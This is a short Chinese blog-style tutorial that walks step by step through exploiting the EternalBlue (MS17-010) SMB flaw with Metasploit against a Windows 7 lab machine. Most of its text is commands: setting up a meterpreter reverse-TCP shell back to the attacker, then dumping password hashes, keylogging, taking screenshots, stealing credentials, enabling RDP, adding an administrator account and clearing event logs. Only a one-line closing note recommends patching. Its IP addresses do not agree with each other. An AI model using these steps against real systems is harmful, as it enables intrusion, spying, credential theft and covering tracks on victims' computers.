永恒之蓝
WannaCry勒索软件中,利用了NSA泄露工具中的“永恒之蓝”漏洞
445端口就是永恒之蓝的入口
我们利用kali里面的Metapsloit工具进行渗透测试(不知道Metasploit百度一下)
测试环境如下
kali的IP:192.168.113.166
win7靶机IP:192.168.84.130
利用模块:ms17_010_eternalblue
1.kali打开Metasploit
1.在终端输入(输入几个字母按Tab键可以自动补全)msfconsole
2.打开模块(输入几个字母按Tab键可以自动补全)use exploit/windows/smb/ms17_010_eternalblue
3.设置输入win7靶机IP地址set RHOSTS 192.168.9.51
4.设置攻击负载模块set payload windows/x64/meterpreter/reverse_tcp
5.设置kali的IPset LHOST 192.168.119.98
6.设置监听端口set LPORT 5555
7.开始执行模块exploit
8.成功入侵win7靶机
(1)我们可以查看他的账户密码的加密值hashdump
(2)我们也可以查看他目前屏幕在做什么screenhot
(3)也可以记录他的键盘keyscan_start
下载键盘记录keyscan_dump
或者上传个木马之类的,总之有很多功能来利用,具体的可以百度查查
(4)获取该计算机已经登陆的账户密码Kerberos
(5)开启3389端口
(6)获取该计算机的超级管理员权限shell
然后可以执行cmd命令
添加一个帐号net user test 123456 /add
升级为管理员帐号
也可以执行一些你想要的命令exit //退出shell
clearev //清楚操作日志
445端口永恒之蓝,是个非常危险的漏洞,如果你计算机上也有这个漏洞,不想被看光隐私的话不妨打个补丁
--小顾
分享到:更多